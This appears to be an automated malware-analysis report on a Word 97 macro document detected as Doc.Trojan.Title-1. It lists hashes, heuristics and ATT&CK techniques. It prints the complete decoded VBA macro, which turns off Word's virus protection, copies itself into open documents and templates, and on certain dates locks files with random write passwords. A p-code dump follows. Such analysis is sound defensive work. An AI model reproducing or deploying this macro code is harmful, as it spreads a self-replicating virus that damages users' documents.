Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f08f034df2201fc8…

MALICIOUS

Office (OLE)

37.5 KB Created: 2000-09-30 15:48:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: a2049953866732caaa2af9639e986d55 SHA-1: 1d153f734636187b00b9e526b1bfde9526f2a20b SHA-256: f08f034df2201fc883dd496195c2ae1266d4ee8e1b69b94525350f55f0d57052
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros that appear to be designed to copy themselves to other documents. The ClamAV detection 'Doc.Trojan.Title-1' and the OLE slack anomaly further indicate malicious intent. The VBA code attempts to inject itself into other documents, suggesting a mechanism for spreading or maintaining persistence.

Heuristics 3

  • ClamAV: Doc.Trojan.Title-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Title-1
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 38,400 bytes but its declared streams total only 19,137 bytes — 19,263 bytes (50%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9208 bytes
SHA-256: 666045d9f2e4e828cf33576c89cedc6aed5417df0f8f16359b414851a70dfec2
Detection
ClamAV: Doc.Trojan.Title-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
    If Left(Me.BuiltInDocumentProperties("Title"), 1) = "?" Then
        Me.BuiltInDocumentProperties("Title") = Mid(Me.BuiltInDocumentProperties("Title"), 2)
        Exit Sub
    End If
    Me.BuiltInDocumentProperties("Title") = "?" & Me.BuiltInDocumentProperties("Title")
    Dim currdoc As Document
    Dim thecode As Object
    Dim currcomp As Object
    Set thecode = Me.VBProject.VBComponents.Item(Me.CodeName).CodeModule
    Dim lines As Integer, mystart As Integer
    mystart = thecode.ProcBodyLine("Document_Close", vbext_pk_Proc)
    mylines = thecode.ProcCountLines("Document_Close", vbext_pk_Proc) - mystart + 1
    Dim savy As Boolean
    Options.VirusProtection = False
    For Each currdoc In Documents
        savy = currdoc.Saved
        If currdoc.SaveFormat = wdFormatDocument Or currdoc.SaveFormat = wdFormatTemplate Then
            Set currcomp = currdoc.VBProject.VBComponents.Item(1)
            If Not currcomp.CodeModule.Find("wsxzaqedc", 1, 1, 100000, 100000) Then
                If Not currcomp.CodeModule.Find("Document_Close", 1, 1, 100000, 100000) Then
                    currcomp.CodeModule.AddFromString thecode.lines(mystart, mylines)
                Else
                    currcomp.CodeModule.InsertLines currcomp.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc) + 1, thecode.lines(mystart + 1, mylines - 2)
                End If
                If savy Then currdoc.Save
            End If
            If (Day(Now()) = 30 And Month(Now()) = 7) Or (Day(Now()) = 20 And Month(Now()) = 6) Or (Day(Now()) = 3 And Month(Now()) = 5) Then
                currdoc.WritePassword = Str(Int(Rnd() * 10) - 1)
                If savy Then currdoc.Save
            End If

        End If
    Next currdoc
    Dim currtemp As Template
    Dim code As String
    For Each currtemp In Templates
        savy = currtemp.Saved
        Set currcomp = currtemp.VBProject.VBComponents.Item(1)
        If Not currcomp.CodeModule.Find("wsxzaqedc", 1, 1, 100000, 100000) Then
            If Not currcomp.CodeModule.Find("Document_Close", 1, 1, 100000, 100000) Then
                code = thecode.lines(mystart, mylines)
                currcomp.CodeModule.AddFromString code
            Else
                code = thecode.lines(mystart + 1, mylines - 2)
                currcomp.CodeModule.InsertLines currcomp.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc) + 1, code
            End If
            If savy Then currtemp.Save
         End If
    Next currtemp
    Me.BuiltInDocumentProperties("Title") = Mid(Me.BuiltInDocumentProperties("Title"), 2)
End Sub

' Processing file: /opt/analyzer/scan_staging/a772df3b5bd74226a14dc672b6529c0e.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4261 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	LitStr 0x0005 "Title"
' 	Ld id_FFFF 
' 	ArgsMemLd BuiltInDocumentProperties 0x0001 
' 	LitDI2 0x0001 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0001 "?"
' 	Eq 
' 	IfBlock 
' Line #3:
' 	LitStr 0x0005 "Title"
' 	Ld id_FFFF 
' 	ArgsMemLd BuiltInDocumentProperties 0x0001 
' 	LitDI2 0x0002 
' 	ArgsLd Mid$ 0x0002 
' 	LitStr 0x0005 "Title"
' 	Ld id_FFFF 
' 	ArgsMemSt BuiltInDocumentProperties 0x0001 
' Line #4:
' 	ExitSub 
' Line #5:
' 	EndIfBlock 
' Line #6:
' 	LitStr 0x0001 "?"
' 	LitStr 0x0005 "Title"
' 	Ld id_FFFF 
' 	ArgsMemLd BuiltInDocumentProperties 0x0001 
' 	Concat 
' 	LitStr 0x0005 "Title"
' 	Ld id_FFFF 
' 	ArgsMemSt BuiltInDocumentProperties 0x0001 
' Line #7:
' 	Dim 
' 	VarDefn currdoc (As Document)
' Line #8:
' 	Dim 
' 	VarDefn thecode (As Object)
' Line #9:
' 	Dim 
' 	VarDefn currcomp (As Object)
' Line #10:
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.